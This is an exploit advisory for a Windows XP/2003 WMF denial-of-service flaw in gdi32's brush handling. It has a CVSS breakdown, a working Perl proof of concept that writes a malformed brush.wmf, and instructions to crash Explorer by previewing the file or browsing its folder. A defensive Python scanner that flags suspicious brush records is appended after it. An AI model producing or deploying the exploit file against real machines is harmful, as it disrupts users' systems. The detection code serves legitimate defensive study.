0-day XP SP2 wmf exploit

2006.08.11
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Description: yet another 'windows meta file' (WMF) denial of service exploit.

System affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info: page fault in gdi32!CreateBrushIndirect() caused by an invalid pointer access. An incorrect (short) to (void*) sign extension is also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse a folder containing brush.wmf in Windows Explorer).

Discovered: 06/24/2006; vendor informed but has not answered
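A defensive check for the condition described above, added here as an example and not part of the original advisory: a record walker that flags META_CREATEBRUSHINDIRECT records whose brush style makes Win32 treat the 16-bit hatch field as a handle or pointer. The helper names `record`, `sample` and `scan_wmf` are hypothetical, the sample files are constructed, and treating those styles as suspicious is a heuristic assumption.

```python
import struct

META_CREATEBRUSHINDIRECT, META_EOF = 0x02FC, 0x0000
# Win32 LOGBRUSH styles whose lbHatch member is a handle or pointer, not a value.
POINTER_STYLES = {3: "BS_PATTERN", 5: "BS_DIBPATTERN",
                  6: "BS_DIBPATTERNPT", 8: "BS_DIBPATTERN8X8"}

def record(func, params=b""):
    """Hypothetical helper: one WMF record (size in 16-bit words, function, params)."""
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params

def sample(style, hatch):
    """Constructed test file: 18-byte header, one brush record, EOF record."""
    brush = struct.pack("<HIH", style, 0, hatch)  # style, colour, hatch
    body = record(META_CREATEBRUSHINDIRECT, brush) + record(META_EOF)
    words = (18 + len(body)) // 2
    return struct.pack("<HHHIHIH", 1, 9, 0x0300, words, 1, 7, 0) + body

def scan_wmf(data):
    """Walk the records of a standard (non-placeable) WMF and return findings."""
    if len(data) < 18:
        return ["truncated header"]
    ftype, hdr_words = struct.unpack_from("<HH", data, 0)
    if ftype not in (1, 2) or hdr_words != 9:
        return ["not a standard WMF header"]
    findings, off = [], 18
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        size = size_words * 2
        if size_words < 3 or off + size > len(data):
            findings.append(f"offset {off}: bad record size {size_words} words")
            break
        if func == META_EOF:
            break
        if func == META_CREATEBRUSHINDIRECT and size < 14:
            findings.append(f"offset {off}: short LogBrush record")
        elif func == META_CREATEBRUSHINDIRECT:
            style, _colour, hatch = struct.unpack_from("<HIh", data, off + 6)
            if style in POINTER_STYLES:
                ptr = hatch & 0xFFFFFFFF  # signed short widened to 32 bits
                findings.append(f"offset {off}: {POINTER_STYLES[style]} brush, "
                                f"hatch field as pointer 0x{ptr:08X}")
        off += size
    return findings

if __name__ == "__main__":
    print(scan_wmf(sample(0, 0)), scan_wmf(sample(8, 0x8000)))
```

The scanner only covers standard WMF headers; placeable files with the extra 22-byte prefix would need that prefix skipped first.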

